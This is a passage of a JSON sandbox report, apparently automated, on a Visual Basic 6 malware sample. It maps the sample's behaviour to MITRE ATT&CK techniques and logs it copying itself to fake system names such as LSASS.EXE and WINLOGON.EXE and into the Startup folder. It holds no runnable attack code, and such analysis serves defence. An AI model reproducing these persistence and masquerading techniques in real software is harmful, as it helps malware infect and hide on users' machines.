"00000000-00000960", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "bd8a8aed932f7149f942a3c01158919b4bde2528222df4c732fe0593e3ffe15a"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Drive-by Compromise", "attck_id": "T1189", "attck_id_wiki": "https://attack.mitre.org/techniques/T1189", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Code Signing Policy Modification", "attck_id": "T1553.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Removable Media", "attck_id": "T1025", "attck_id_wiki": "https://attack.mitre.org/techniques/T1025", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe to new location %WINDIR%\\D3_08.exe (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe to new location C:\\D3_08.exe (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe to new location %WINDIR%\\system32\\MrD3_08.scr (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.pif to new location %WINDIR%\\D3_08.exe (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.pif to new location C:\\D3_08.exe (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.pif to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.pif to new location %WINDIR%\\system32\\MrD3_08.scr (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.pif to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.pif to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.pif to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.pif to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.pif to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.pif to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.pif to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.scr to new location %WINDIR%\\D3_08.exe (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.scr to new location C:\\D3_08.exe (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"CopyFileA\" to copy C:\\\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.scr to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00000960)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-0", "type": 10, "name": "Loads the visual basic runtime environment", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"D3_08.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"D3_08.exe\" loaded module \"%WINDIR%\\msvbvm60.dll\" at 72940000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"services.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"shell.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Data HAPUBWS.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Empty.pif\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"New Folder.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"WINLOGON.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67EE4B9B.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SERVICES.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67EE4669.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SMSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"LSASS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"MrD3_08.scr\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.EXE.67EE4A8B.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.EXE.67EE4667.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67EE4A8E.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"services.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte 